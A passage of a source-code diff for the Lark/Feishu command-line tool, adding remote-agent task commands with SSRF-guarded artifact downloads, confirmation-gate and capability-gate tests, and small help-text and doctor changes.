// confirmation_required (exit 10) BEFORE reaching the provider — the unset send
// hook is a tripwire that would panic if the gate let the upload through.
func TestSend_FileRequiresYes(t *testing.T) {
opts := sendTestOpts(t)
opts.Text = "hi"
opts.Files = []string{"local.txt"} // no --yes
err := agentSendRun(opts)
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.SubtypeConfirmationRequired {
t.Fatalf("send --file without --yes should be confirmation_required, got %+v (err=%v)", p, err)
}
if output.ExitCodeOf(err) != output.ExitConfirmationRequired {
t.Fatalf("exit should be %d, got %d", output.ExitConfirmationRequired, output.ExitCodeOf(err))
}
}
// TestSend_FileWithYesProceeds pins that --yes satisfies the --file gate: the
// send reaches the provider, which receives the file path.
func TestSend_FileWithYesProceeds(t *testing.T) {
opts := sendTestOpts(t)
sent := false
setScripted(t, scriptedHooks{send: func(in iagent.SendInput) (*iagent.AgentTask, error) {
sent = true
if len(in.Files) != 1 || in.Files[0] != "local.txt" {
t.Errorf("provider should receive the --file path, got %v", in.Files)
}
return &iagent.AgentTask{TaskID: "t1", State: iagent.StateCompleted, IsTerminal: true}, nil
}})
opts.Text = "hi"
opts.Files = []string{"local.txt"}
opts.Yes = true
if err := agentSendRun(opts); err != nil {
t.Fatalf("send --file --yes should proceed: %v", err)
}
if !sent {
t.Error("provider Send should be reached after --yes")
}
}
// TestSend_FileDryRunNotGated pins that --dry-run with --file is exempt from the
// gate (dry-run never uploads), so it needs no --yes and never reaches the
// provider (unset send hook stays a tripwire).
func TestSend_FileDryRunNotGated(t *testing.T) {
opts := sendTestOpts(t)
opts.Text = "hi"
opts.Files = []string{"local.txt"}
opts.DryRun = true // no --yes
if err := agentSendRun(opts); err != nil {
t.Fatalf("dry-run --file should not be gated: %v", err)
}
}

485
cmd/agent/task.go Normal file
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@@ -0,0 +1,485 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"context"
"fmt"
"io"
"net/http"
"strings"
"time"
"github.com/spf13/cobra"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/output"
"github.com/larksuite/cli/internal/validate"
"github.com/larksuite/cli/internal/vfs"
)
// maxArtifactBytes caps a single downloaded artifact to guard against an
// untrusted host streaming an unbounded body onto local disk.
const maxArtifactBytes = 256 << 20 // 256 MiB
// taskOptions holds all inputs for the `agent task get|list|cancel` leaves. A
// single struct backs all three so the shared fields (Factory, Cmd, Ref, As)
// are wired once; each RunE reads only the fields its verb needs.
type taskOptions struct {
Factory *cmdutil.Factory
Cmd *cobra.Command
Ref string
TaskID string
ContextID string
ArtifactID string
Output string
Force bool
Watch bool
Timeout time.Duration
As string
Format string
}
// resolveDownload is the DownloadArtifact seam: it resolves the provider
// addressed by opts under the effective identity, runs the local scope
// preflight, and fetches the artifact descriptor. Tests swap it to return
// inline bytes without a Factory / network.
var resolveDownload = func(opts *taskOptions) (*iagent.ArtifactData, error) {
p, id, err := resolveProvider(opts.Factory, opts.Cmd, opts.Ref, opts.As)
if err != nil {
return nil, err
}
// Capability gate before the API call: a provider that does not wire
// DownloadArtifact (card artifact_download=false) returns unsupported_capability.
if p.DownloadArtifact == nil {
return nil, capabilityError(opts.Ref, "artifact download", iagent.CapArtifactDownload)
}
if err := preflightScopesForRef(opts.Factory, id, opts.Ref); err != nil {
return nil, err
}
return p.DownloadArtifact(opts.Cmd.Context(), opts.TaskID, opts.ArtifactID)
}
// artifactFetch is the URL-download seam: it SSRF-validates rawURL and fetches
// its bytes with a download-hardened client. Tests swap it to serve a loopback
// httptest server (which the production SSRF guard would otherwise block).
var artifactFetch = fetchArtifactURL
// hardenDownloadClient is the download-client-build seam inside fetchArtifactURL.
// Production wraps the base client with the SSRF-hardened redirect/dial rules;
// tests swap it to pass the (interceptable) base client through unchanged so the
// request/status/read/limit logic can run against an httpmock transport that the
// hardened client's transport clone would otherwise discard.
var hardenDownloadClient = func(base *http.Client) *http.Client {
return validate.NewDownloadHTTPClient(base, validate.DownloadHTTPClientOptions{})
}
// NewCmdAgentTask builds the `agent task` command group: query, list and cancel
// tasks on a remote agent. It is a pure group with no RunE so an unknown
// subcommand is reported rather than silently swallowed.
func NewCmdAgentTask(f *cmdutil.Factory) *cobra.Command {
cmd := &cobra.Command{
Use: "task",
Short: "Query / list / cancel a remote agent's tasks",
Long: "task get <agent_ref> <task-id> queries a single task (with --watch polling and --artifact download); task list <agent_ref> lists tasks; task cancel <agent_ref> <task-id> cancels (capability-gated).",
}
cmd.AddCommand(NewCmdAgentTaskGet(f))
cmd.AddCommand(NewCmdAgentTaskList(f))
cmd.AddCommand(NewCmdAgentTaskCancel(f))
return cmd
}
// NewCmdAgentTaskGet builds `agent task get <ref> <task-id>`: fetch a single
// task's state and artifacts. `--watch` polls until the task reaches a stop
// condition and the terminal state drives the semantic exit code;
// `--timeout` bounds that poll (0 = unbounded, blocking to a stop condition —
// the backward-compatible default). `--artifact <id>` downloads that artifact
// to `-o` instead of printing the task: a URL-type artifact is SSRF-validated
// and fetched, an inline-bytes artifact is written straight to disk.
// Risk=read.
func NewCmdAgentTaskGet(f *cmdutil.Factory) *cobra.Command {
opts := &taskOptions{Factory: f}
cmd := &cobra.Command{
Use: "get <agent_ref> <task-id>",
Short: "Query a single task's state and artifacts",
Long: "Query the state and artifacts of task-id under the agent addressed by agent_ref. --watch polls until a stop condition and then prints the final state; --timeout bounds the watch (0 = unbounded, blocking to a terminal state). --artifact <id> with -o downloads that artifact to a local file.",
Args: exactArgsWithUsage(2),
RunE: func(cmd *cobra.Command, args []string) error {
if err := validateFormat(opts.Format); err != nil {
return err
}
opts.Cmd = cmd
opts.Ref = args[0]
opts.TaskID = args[1]
return agentTaskGetRun(opts)
},
}
cmd.Flags().BoolVar(&opts.Watch, "watch", false, "轮询任务直到进入停轮询条件(终态 / 需补输入 / 需补鉴权)再打印最终状态")
cmd.Flags().DurationVar(&opts.Timeout, "timeout", 0, "--watch 的最长轮询时长,如 30s0=无界(阻塞到终态);到点未终止则返回当前状态+续 watch 命令")
cmd.Flags().StringVar(&opts.ArtifactID, "artifact", "", "下载指定产物 id须配合 -o 指定落盘路径),不打印任务详情")
cmd.Flags().StringVarP(&opts.Output, "output", "o", "", "产物落盘路径(仅 --artifact 时使用)")
cmd.Flags().BoolVar(&opts.Force, "force", false, "允许覆盖已存在的 -o 目标文件(默认拒绝覆盖,防止误毁本地文件)")
cmd.Flags().StringVar(&opts.Format, "format", "json", formatFlagHelp)
cmd.Flags().String("jq", "", "用 jq 表达式过滤 JSON 输出")
addAsFlag(cmd, f, &opts.As)
cmdutil.SetRisk(cmd, cmdutil.RiskRead)
return cmd
}
// NewCmdAgentTaskList builds `agent task list <ref>`: enumerate the agent's
// tasks, optionally filtered by `--context-id`, into {tasks:[...]} with a
// meta.count. Risk=read.
func NewCmdAgentTaskList(f *cmdutil.Factory) *cobra.Command {
opts := &taskOptions{Factory: f}
cmd := &cobra.Command{
Use: "list <agent_ref>",
Short: "List a remote agent's tasks",
Long: "List the tasks of the agent addressed by agent_ref; --context-id filters by multi-turn context.",
Args: exactArgsWithUsage(1),
RunE: func(cmd *cobra.Command, args []string) error {
if err := validateFormat(opts.Format); err != nil {
return err
}
opts.Cmd = cmd
opts.Ref = args[0]
return agentTaskListRun(opts)
},
}
cmd.Flags().StringVar(&opts.ContextID, "context-id", "", "按多轮上下文 id 过滤任务")
cmd.Flags().StringVar(&opts.Format, "format", "json", formatFlagHelp)
cmd.Flags().String("jq", "", "用 jq 表达式过滤 JSON 输出")
addAsFlag(cmd, f, &opts.As)
cmdutil.SetRisk(cmd, cmdutil.RiskRead)
return cmd
}
// NewCmdAgentTaskCancel builds `agent task cancel <ref> <task-id>`: cancel
// (interrupt) a task. Cancel is capability-gated on the Card's task_cancel: for
// an agent that does not support it (task_cancel=false, e.g. example:echo) the
// command returns unsupported_capability without contacting the API.
// Risk=write.
func NewCmdAgentTaskCancel(f *cmdutil.Factory) *cobra.Command {
opts := &taskOptions{Factory: f}
cmd := &cobra.Command{
Use: "cancel <agent_ref> <task-id>",
Short: "Cancel (interrupt) a remote agent's task",
Long: "Cancel task-id under the agent addressed by agent_ref. If the agent does not support cancel (card task_cancel=false), it returns unsupported_capability without sending a request.",
Args: exactArgsWithUsage(2),
RunE: func(cmd *cobra.Command, args []string) error {
if err := validateFormat(opts.Format); err != nil {
return err
}
opts.Cmd = cmd
opts.Ref = args[0]
opts.TaskID = args[1]
return agentTaskCancelRun(opts)
},
}
cmd.Flags().StringVar(&opts.Format, "format", "json", formatFlagHelp)
cmd.Flags().String("jq", "", "用 jq 表达式过滤 JSON 输出")
addAsFlag(cmd, f, &opts.As)
cmdutil.SetRisk(cmd, cmdutil.RiskWrite)
return cmd
}
// addAsFlag registers the identity flag: the real API-identity flag when a
// Factory is present, or a bare --as for construction-time unit tests (f nil).
func addAsFlag(cmd *cobra.Command, f *cmdutil.Factory, as *string) {
if f != nil {
cmdutil.AddAPIIdentityFlag(cmd.Context(), cmd, f, as)
return
}
cmd.Flags().StringVar(as, "as", "", "identity type: user | bot")
}
// agentTaskGetRun runs `task get`. The `--artifact` client-side guard (requires
// -o) runs first so it never touches the network and holds under a nil Factory.
// With `--artifact` it downloads the named artifact to -o; otherwise it
// fetches the task, optionally polling it to a stop condition under --watch, and
// emits the task with the terminal state driving the semantic exit code.
func agentTaskGetRun(opts *taskOptions) error {
if opts.ArtifactID != "" {
if opts.Output == "" {
return errs.NewValidationError(errs.SubtypeInvalidArgument,
"--artifact 需配合 -o/--output 指定落盘路径").
WithParam("--output").
WithHint("补充 -o <落盘路径> 后重发")
}
return downloadArtifact(opts)
}
// --timeout only bounds the --watch poll; without --watch it is meaningless.
// Guard it client-side (mirrors the send --task-id/--context-id combo check)
// so it never touches the network and holds under a nil Factory.
if opts.Timeout > 0 && !opts.Watch {
return errs.NewValidationError(errs.SubtypeInvalidArgument,
"--timeout 需与 --watch 一起使用").
WithParam("--timeout").
WithHint("--timeout 需与 --watch 一起使用")
}
f := opts.Factory
p, id, err := resolveProvider(f, opts.Cmd, opts.Ref, opts.As)
if err != nil {
return err
}
// Local scope preflight: after resolveProvider, before the API call.
if err := preflightScopesForRef(f, id, opts.Ref); err != nil {
return err
}
ctx := opts.Cmd.Context()
task, err := p.GetTask(ctx, opts.TaskID)
if err != nil {
return err
}
if opts.Watch && !task.State.ShouldStopPolling() {
// A positive --timeout bounds the poll: pollToStop returns the most recent
// task with a nil error when the deadline fires (a timeout is an
// observation-window close, not a failure), so a long task degrades to
// "current state + a fresh watch hint" instead of blocking forever. 0 =
// unbounded (the backward-compatible default). pollToStop is unchanged.
pollCtx := ctx
if opts.Timeout > 0 {
var cancel context.CancelFunc
pollCtx, cancel = context.WithTimeout(ctx, opts.Timeout)
defer cancel()
}
final, perr := pollToStop(pollCtx, p, opts.TaskID)
if perr != nil {
return perr
}
if final != nil {
task = final
}
}
// Derive IsTerminal from State (single source of truth) before any consumer
// — emitTask's output and semanticExitError below both read the flag.
normalizeTask(task)
if err := emitTask(f, opts.Cmd, task, nextForTask(opts.Ref, task), opts.Format); err != nil {
return err
}
// Under --watch a non-successful terminal state signals exit 1; a
// plain get (or a non-terminal stop) is exit 0.
if opts.Watch {
return semanticExitError(task)
}
return nil
}
// agentTaskListRun runs `task list`: resolves the provider, lists tasks
// (optionally filtered by --context-id) and emits {tasks:[...]} with meta.count.
func agentTaskListRun(opts *taskOptions) error {
f := opts.Factory
p, id, err := resolveProvider(f, opts.Cmd, opts.Ref, opts.As)
if err != nil {
return err
}
// Capability gate before the API call: a provider that does not wire
// ListTasks (card task_list=false) returns unsupported_capability.
if p.ListTasks == nil {
return capabilityError(opts.Ref, "task list", iagent.CapTaskList)
}
// Local scope preflight: after resolveProvider, before the API call.
if err := preflightScopesForRef(f, id, opts.Ref); err != nil {
return err
}
tasks, err := p.ListTasks(opts.Cmd.Context(), opts.ContextID)
if err != nil {
return err
}
tasks = normalizeTaskSummaries(tasks)
// pretty is a human view only; a --jq expression implies structured JSON.
if opts.Format == "pretty" && jqExpr(opts.Cmd) == "" {
printTaskSummariesTSV(f.IOStreams.Out, tasks)
return nil
}
env := output.Envelope{
OK: true,
Identity: string(id),
Data: map[string]interface{}{"tasks": tasks},
Meta: &output.Meta{Count: len(tasks)},
Notice: output.GetNotice(),
}
if jq := jqExpr(opts.Cmd); jq != "" {
return output.JqFilter(f.IOStreams.Out, env, jq)
}
output.PrintJson(f.IOStreams.Out, env)
return nil
}
// agentTaskCancelRun runs `task cancel`. Cancel is capability-gated before any
// network access: it resolves the (statically synthesized) Card for ref and, if
// task_cancel is not supported, returns unsupported_capability without a Factory
// or API call. Only a supporting provider reaches resolveProvider +
// CancelTask.
func agentTaskCancelRun(opts *taskOptions) error {
// Gate before requiring a Factory / network: resolve with zero Deps and read
// the CancelTask capability (a wired field == card task_cancel=true). An agent
// that does not support cancel (e.g. example:echo) returns
// unsupported_capability with no Factory or API access.
probe, err := iagent.Resolve(opts.Ref, iagent.Deps{})
if err != nil {
return wrapRefResolveError(err)
}
if probe.CancelTask == nil {
return capabilityError(opts.Ref, "task cancel", iagent.CapTaskCancel)
}
f := opts.Factory
p, id, err := resolveProvider(f, opts.Cmd, opts.Ref, opts.As)
if err != nil {
return err
}
// Local scope preflight: after resolveProvider, before the API call.
// A task_cancel=false agent never reaches here (gated above); it is wired so
// a provider that supports cancel is not silently exempt from the
// all-or-nothing scope check.
if err := preflightScopesForRef(f, id, opts.Ref); err != nil {
return err
}
if err := p.CancelTask(opts.Cmd.Context(), opts.TaskID); err != nil {
return err
}
// pretty is a human view only; a --jq expression implies structured JSON.
if opts.Format == "pretty" && jqExpr(opts.Cmd) == "" {
fmt.Fprintf(f.IOStreams.Out, "task_id: %s\ncanceled: true\n", kvValue(opts.TaskID))
return nil
}
env := output.Envelope{
OK: true,
Identity: string(id),
Data: map[string]interface{}{"task_id": opts.TaskID, "canceled": true},
Notice: output.GetNotice(),
}
if jq := jqExpr(opts.Cmd); jq != "" {
return output.JqFilter(f.IOStreams.Out, env, jq)
}
output.PrintJson(f.IOStreams.Out, env)
return nil
}
// downloadArtifact resolves the artifact descriptor and writes it to opts.Output
// under vfs. A URL-type artifact is SSRF-validated and fetched over a
// download-hardened client; an inline-bytes artifact is written directly. The
// output path is validated with SafeOutputPath (relative, within the CWD)
// before any write.
func downloadArtifact(opts *taskOptions) error {
safePath, err := validate.SafeOutputPath(opts.Output)
if err != nil {
return errs.NewValidationError(errs.SubtypeInvalidArgument, "非法的 -o 路径: %v", err).
WithParam("--output").WithCause(err)
}
// Overwriting a local file destroys its content irreversibly — a high-risk
// write. It goes through the same confirmation contract as other --force
// gates (config bind): without --force, a would-be overwrite returns
// confirmation_required (exit 10) before any download. Lstat (not Stat) so a
// symlink at the path counts as existing rather than being followed.
if !opts.Force {
if _, statErr := vfs.Lstat(safePath); statErr == nil {
return errs.NewConfirmationRequiredError(errs.RiskHighRiskWrite, "agent task get --artifact -o",
"目标文件已存在,覆盖会不可逆地毁掉本地内容: %s", safePath).
WithHint("确认要覆盖后加 --force 重跑,或换一个 -o 路径")
}
}
ctx := opts.Cmd.Context()
art, err := resolveDownload(opts)
if err != nil {
return err
}
data := art.Bytes
if art.URL != "" {
data, err = artifactFetch(ctx, opts.Factory, art.URL)
if err != nil {
return err
}
}
if err := vfs.WriteFile(safePath, data, 0o600); err != nil {
return errs.NewInternalError(errs.SubtypeFileIO, "写产物到 %s 失败: %v", safePath, err).WithCause(err)
}
f := opts.Factory
// pretty is a human view only; a --jq expression implies structured JSON.
if opts.Format == "pretty" && jqExpr(opts.Cmd) == "" {
out := f.IOStreams.Out
fmt.Fprintf(out, "artifact_id: %s\n", kvValue(opts.ArtifactID))
fmt.Fprintf(out, "path: %s\n", safePath)
fmt.Fprintf(out, "bytes: %d\n", len(data))
if art.Mime != "" {
fmt.Fprintf(out, "mime: %s\n", kvValue(art.Mime))
}
// suggested_name is the server-suggested name, for reference only; the
// actual on-disk path is already the safePath (-o) above.
if art.Name != "" {
fmt.Fprintf(out, "suggested_name: %s\n", kvValue(art.Name))
}
return nil
}
env := output.Envelope{
OK: true,
Identity: string(f.ResolvedIdentity),
Data: map[string]interface{}{
"artifact_id": opts.ArtifactID,
"path": safePath,
"bytes": len(data),
"mime": art.Mime,
"suggested_name": art.Name,
},
Notice: output.GetNotice(),
}
if jq := jqExpr(opts.Cmd); jq != "" {
return output.JqFilter(f.IOStreams.Out, env, jq)
}
output.PrintJson(f.IOStreams.Out, env)
return nil
}
// fetchArtifactURL is the production URL fetch: it SSRF-validates rawURL, builds
// a download-hardened HTTP client from the Factory and reads at most
// maxArtifactBytes of the body. The artifact host is untrusted external content,
// so both the URL and the redirect chain are guarded.
func fetchArtifactURL(ctx context.Context, f *cmdutil.Factory, rawURL string) ([]byte, error) {
if err := validate.ValidateDownloadSourceURL(ctx, rawURL); err != nil {
return nil, errs.NewValidationError(errs.SubtypeInvalidArgument, "被拦截的产物 URL: %v", err).
WithCause(err)
}
// Artifact bytes come from an untrusted host over the network; require https
// so the payload cannot be read or tampered with in transit. The SSRF check
// above already rejects private/loopback hosts and non-http(s) schemes, so a
// surviving non-https URL is plain-text http.
if !strings.HasPrefix(strings.ToLower(rawURL), "https://") {
return nil, errs.NewValidationError(errs.SubtypeInvalidArgument, "产物 URL 必须为 https拒绝明文下载")
}
base, err := f.HttpClient()
if err != nil {
return nil, errs.NewInternalError(errs.SubtypeSDKError, "构造 http client 失败: %v", err).WithCause(err)
}
client := hardenDownloadClient(base)
req, err := http.NewRequestWithContext(ctx, http.MethodGet, rawURL, nil)
if err != nil {
return nil, errs.NewValidationError(errs.SubtypeInvalidArgument, "非法的产物 URL: %v", err).WithCause(err)
}
resp, err := client.Do(req)
if err != nil {
return nil, errs.NewNetworkError(errs.SubtypeNetworkTransport, "下载产物失败: %v", err).WithCause(err)
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
return nil, errs.NewNetworkError(errs.SubtypeNetworkServer, "下载产物失败: HTTP %d", resp.StatusCode)
}
data, err := io.ReadAll(io.LimitReader(resp.Body, maxArtifactBytes))
if err != nil {
return nil, errs.NewNetworkError(errs.SubtypeNetworkTransport, "读取产物响应失败: %v", err).WithCause(err)
}
return data, nil
}

1021
cmd/agent/task_test.go Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,155 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"context"
"encoding/json"
"strings"
"sync"
"testing"
"github.com/larksuite/cli/errs"
iagent "github.com/larksuite/cli/internal/agent"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/output"
)
// newUnsupProvider builds a stub *Provider driving the command-layer
// capability-gate wirings without any HTTP: ListContexts / DeleteContext are
// left UNWIRED (nil), so the command layer's nil-gate must return the typed
// unsupported_capability before any network access. GetTask is wired to return a
// task whose IsTerminal deliberately mismatches its State (normalizeTask must
// re-derive it). Send is wired (core, required by Register) but never called
// here. There is no capability-refusal code in the provider — "unsupported" is
// expressed purely by the absent fields.
func newUnsupProvider() *iagent.Provider {
return &iagent.Provider{
Send: func(ctx context.Context, in iagent.SendInput) (*iagent.AgentTask, error) {
panic("unsup provider: Send should not be called")
},
GetTask: func(ctx context.Context, taskID string) (*iagent.AgentTask, error) {
// Deliberate mismatch: State is terminal but IsTerminal=false (simulating
// a provider that forgot to set it or set it wrong).
return &iagent.AgentTask{TaskID: taskID, State: iagent.StateCompleted, IsTerminal: false}, nil
},
// ListContexts / DeleteContext intentionally unwired ⇒ unsupported.
}
}
// registerFakeUnsup registers the fakeunsup scheme exactly once (Register
// panics on duplicates). Like the other fakes it leaks into the package-level
// registry for the remaining tests of this package run.
var registerFakeUnsupOnce sync.Once
func registerFakeUnsup() {
registerFakeUnsupOnce.Do(func() {
iagent.Register("fakeunsup", iagent.ProviderInfo{
Factory: func(deps iagent.Deps, agentID string) (*iagent.Provider, error) { return newUnsupProvider(), nil },
Label: "test fake (unwired optional capabilities)",
AgentRefFormat: "fakeunsup:<agent_id>",
AgentIDSource: "test only",
Kind: iagent.KindInstance,
Identities: []iagent.IdentitySpec{{Type: iagent.IdentityUser}, {Type: iagent.IdentityBot}},
})
})
}
// assertUnsupportedCapability pins the full capability-gate contract on err:
// validation typed, subtype unsupported_capability, exit 2, hint pointing at
// `agent card <ref>`, and — because the Factory's httpmock registry has zero
// stubs — no HTTP was issued (any network attempt would have surfaced as an
// "httpmock: no stub" error instead of the typed one).
func assertUnsupportedCapability(t *testing.T, err error, ref string) {
t.Helper()
if err == nil {
t.Fatal("an unsupported capability should error")
}
if !errs.IsValidation(err) {
t.Fatalf("want validation error, got %T (%v)", err, err)
}
if code := output.ExitCodeOf(err); code != output.ExitValidation {
t.Fatalf("exit code should be %d, got %d", output.ExitValidation, code)
}
p, ok := errs.ProblemOf(err)
if !ok || p.Subtype != errs.SubtypeUnsupportedCapability {
t.Fatalf("subtype should be unsupported_capability, got %+v", p)
}
if !strings.Contains(p.Hint, "agent card "+ref) {
t.Errorf("hint should point to agent card %s, got %q", ref, p.Hint)
}
if strings.Contains(err.Error(), "httpmock") {
t.Errorf("should not issue any HTTP request, but the error contains httpmock traces: %v", err)
}
}
// TestContextListUnsupportedGated pins the capability gate on `context list`: a
// provider that does not wire ListContexts returns typed unsupported_capability
// (exit 2) with the agent-card hint, without any HTTP.
func TestContextListUnsupportedGated(t *testing.T) {
registerFakeUnsup()
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
opts := &contextOptions{
Factory: f, Cmd: contextCmdCtx(t, "list"), Ref: "fakeunsup:a1", As: "bot", Format: "json",
}
assertUnsupportedCapability(t, agentContextListRun(opts), "fakeunsup:a1")
}
// TestContextDeleteUnsupportedGated pins the same gate on the confirmed
// `context delete` path (--yes passes, provider does not wire DeleteContext).
func TestContextDeleteUnsupportedGated(t *testing.T) {
registerFakeUnsup()
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
opts := &contextOptions{
Factory: f, Cmd: contextCmdCtx(t, "delete"), Ref: "fakeunsup:a1", CtxID: "c1", Yes: true, As: "bot", Format: "json",
}
assertUnsupportedCapability(t, agentContextDeleteRun(opts), "fakeunsup:a1")
}
// TestTaskGetDerivesIsTerminalFromState pins the normalizeTask wiring: a
// provider returning a State/IsTerminal-mismatched task (completed +
// is_terminal=false) must emit is_terminal=true — the command layer derives
// the flag from State, the single source of truth.
func TestTaskGetDerivesIsTerminalFromState(t *testing.T) {
registerFakeUnsup()
f, _, _, _ := cmdutil.TestFactory(t, &core.CliConfig{AppID: "cli_x", AppSecret: "fake-secret", Brand: core.BrandFeishu})
opts := &taskOptions{
Factory: f, Cmd: taskCmdCtx(t, "get"), Ref: "fakeunsup:a1", TaskID: "t1", As: "bot", Format: "json",
}
out := f.IOStreams.Out.(interface{ Bytes() []byte })
if err := agentTaskGetRun(opts); err != nil {
t.Fatalf("task get should not error: %v", err)
}
var env output.Envelope
if err := json.Unmarshal(out.Bytes(), &env); err != nil {
t.Fatalf("output should be valid envelope JSON: %v (%s)", err, string(out.Bytes()))
}
data, _ := env.Data.(map[string]interface{})
if data["state"] != "completed" {
t.Fatalf("data.state should be completed, got %v", data["state"])
}
if data["is_terminal"] != true {
t.Errorf("is_terminal should be derived from State as true (correcting a provider that set false), got %v", data["is_terminal"])
}
}
// TestNormalizeTaskSummaries_DerivesFromState pins the summary-side derivation
// (task list / context get share this helper for their nested Tasks).
func TestNormalizeTaskSummaries_DerivesFromState(t *testing.T) {
ts := normalizeTaskSummaries([]iagent.TaskSummary{
{TaskID: "t1", State: iagent.StateCompleted, IsTerminal: false}, // missing
{TaskID: "t2", State: iagent.StateWorking, IsTerminal: true}, // wrong
})
if !ts[0].IsTerminal {
t.Error("completed summary should derive is_terminal=true")
}
if ts[1].IsTerminal {
t.Error("working summary should derive is_terminal=false")
}
if normalizeTask(nil) != nil {
t.Error("normalizeTask(nil) should be nil-safe")
}
}

View File

@@ -67,8 +67,21 @@ func NewCmdApiWithContext(ctx context.Context, f *cmdutil.Factory, runF func(*AP
cmd := &cobra.Command{
Use: "api <method> <path>",
Short: "Generic Lark API requests",
Args: cobra.ExactArgs(2),
Short: "Raw HTTP escape hatch — call any endpoint by path (fallback when no typed command exists)",
Long: `Raw HTTP escape hatch: send any Lark API request by HTTP method + path.
Prefer the typed domain command when one exists — it validates parameters,
shows the Risk level, gates destructive calls behind --yes, and carries usage
guidance that this raw command does not. If a domain command covers your task
(browse with ` + "`lark-cli <domain> --help`" + `), use it instead of this.
Reach for ` + "`api`" + ` only for endpoints that have no typed command yet (e.g.
newer/preview APIs), where you already have the HTTP path from the Lark docs.
Examples:
lark-cli api GET /open-apis/calendar/v4/calendars
lark-cli api POST /open-apis/im/v1/messages --params '{"receive_id_type":"open_id"}' --data @body.json`,
Args: cobra.ExactArgs(2),
RunE: func(cmd *cobra.Command, args []string) error {
opts.Method = strings.ToUpper(args[0])
opts.Path = args[1]

View File

@@ -8,6 +8,8 @@ import (
"io"
"io/fs"
_ "github.com/larksuite/cli/agent"
"github.com/larksuite/cli/cmd/agent"
"github.com/larksuite/cli/cmd/api"
"github.com/larksuite/cli/cmd/auth"
"github.com/larksuite/cli/cmd/completion"
@@ -19,6 +21,7 @@ import (
"github.com/larksuite/cli/cmd/service"
"github.com/larksuite/cli/cmd/skill"
cmdupdate "github.com/larksuite/cli/cmd/update"
"github.com/larksuite/cli/cmd/whoami"
_ "github.com/larksuite/cli/events"
"github.com/larksuite/cli/internal/apicatalog"
"github.com/larksuite/cli/internal/build"
@@ -170,6 +173,10 @@ func buildInternal(ctx context.Context, inv cmdutil.InvocationContext, opts ...B
rootCmd.SetOut(cfg.streams.Out)
rootCmd.SetErr(cfg.streams.ErrOut)
// Root-only usage template (curated Usage synopsis + skills footer); see
// rootUsageTemplate.
rootCmd.SetUsageTemplate(rootUsageTemplate)
installTipsHelpFunc(rootCmd)
rootCmd.SilenceErrors = true
// SilenceUsage as a static field (not only in PersistentPreRun) so it also
@@ -190,12 +197,14 @@ func buildInternal(ctx context.Context, inv cmdutil.InvocationContext, opts ...B
rootCmd.AddCommand(auth.NewCmdAuth(f))
rootCmd.AddCommand(profile.NewCmdProfile(f))
rootCmd.AddCommand(doctor.NewCmdDoctor(f))
rootCmd.AddCommand(whoami.NewCmdWhoami(f))
rootCmd.AddCommand(api.NewCmdApiWithContext(ctx, f, nil))
rootCmd.AddCommand(schema.NewCmdSchema(f, nil))
rootCmd.AddCommand(completion.NewCmdCompletion(f))
rootCmd.AddCommand(cmdupdate.NewCmdUpdate(f))
rootCmd.AddCommand(cmdevent.NewCmdEvents(f))
rootCmd.AddCommand(skill.NewCmdSkill(f))
rootCmd.AddCommand(agent.NewCmdAgent(f))
if !cfg.skipService {
if cfg.serviceCatalog != nil {
service.RegisterServiceCommandsFromCatalog(ctx, rootCmd, f, *cfg.serviceCatalog)
@@ -205,7 +214,12 @@ func buildInternal(ctx context.Context, inv cmdutil.InvocationContext, opts ...B
}
shortcuts.RegisterShortcutsWithContext(ctx, rootCmd, f)
groupRootCommands(rootCmd)
installUnknownSubcommandGuard(rootCmd)
// Bare `lark-cli` in an interactive terminal offers an interactive upgrade
// before printing help; non-bare invocations and non-TTY are unaffected.
installRootUpgradePrompt(f, rootCmd)
if mode := f.ResolveStrictMode(ctx); mode.IsActive() && !cfg.skipStrictMode {
pruneForStrictMode(rootCmd, mode)

View File

@@ -129,7 +129,10 @@ func doctorRun(opts *DoctorOptions) error {
if diagnostics.Bot.Available || diagnostics.User.Available {
checks = append(checks, pass("identity_ready", "at least one identity is available"))
} else {
checks = append(checks, fail("identity_ready", "no usable bot or user identity is available", "run: lark-cli auth status --verify"))
// No hint: this only summarizes the two checks above, which already carry
// the source-appropriate remediation. A command here would be redundant,
// or wrong (`auth status` is blocked under an external provider).
checks = append(checks, fail("identity_ready", "no usable bot or user identity is available", ""))
}
// ── 4 & 5. Endpoint reachability ──

View File

@@ -4,14 +4,19 @@
package doctor
import (
"bytes"
"context"
"encoding/json"
"net/http"
"strings"
"testing"
"github.com/spf13/cobra"
extcred "github.com/larksuite/cli/extension/credential"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/credential"
)
func TestNewCmdDoctor_FlagParsing(t *testing.T) {
@@ -140,14 +145,84 @@ func TestDoctorRun_SplitsBotAndMissingUserIdentity(t *testing.T) {
}
func assertCheck(t *testing.T, checks []checkResult, name, status string) {
t.Helper()
if got := findCheck(t, checks, name); got.Status != status {
t.Fatalf("%s status = %q, want %q", name, got.Status, status)
}
}
func findCheck(t *testing.T, checks []checkResult, name string) checkResult {
t.Helper()
for _, check := range checks {
if check.Name == name {
if check.Status != status {
t.Fatalf("%s status = %q, want %q", name, check.Status, status)
}
return
return check
}
}
t.Fatalf("check %q not found in %#v", name, checks)
return checkResult{}
}
type fakeExtProvider struct {
name string
account *extcred.Account
}
func (p *fakeExtProvider) Name() string { return p.name }
func (p *fakeExtProvider) ResolveAccount(context.Context) (*extcred.Account, error) {
return p.account, nil
}
func (p *fakeExtProvider) ResolveToken(context.Context, extcred.TokenSpec) (*extcred.Token, error) {
return nil, nil
}
// Under an external credential provider with no usable identity, the
// identity_ready hint must not point at `auth status` (blocked there); the
// per-identity checks already carry the source-appropriate escalation.
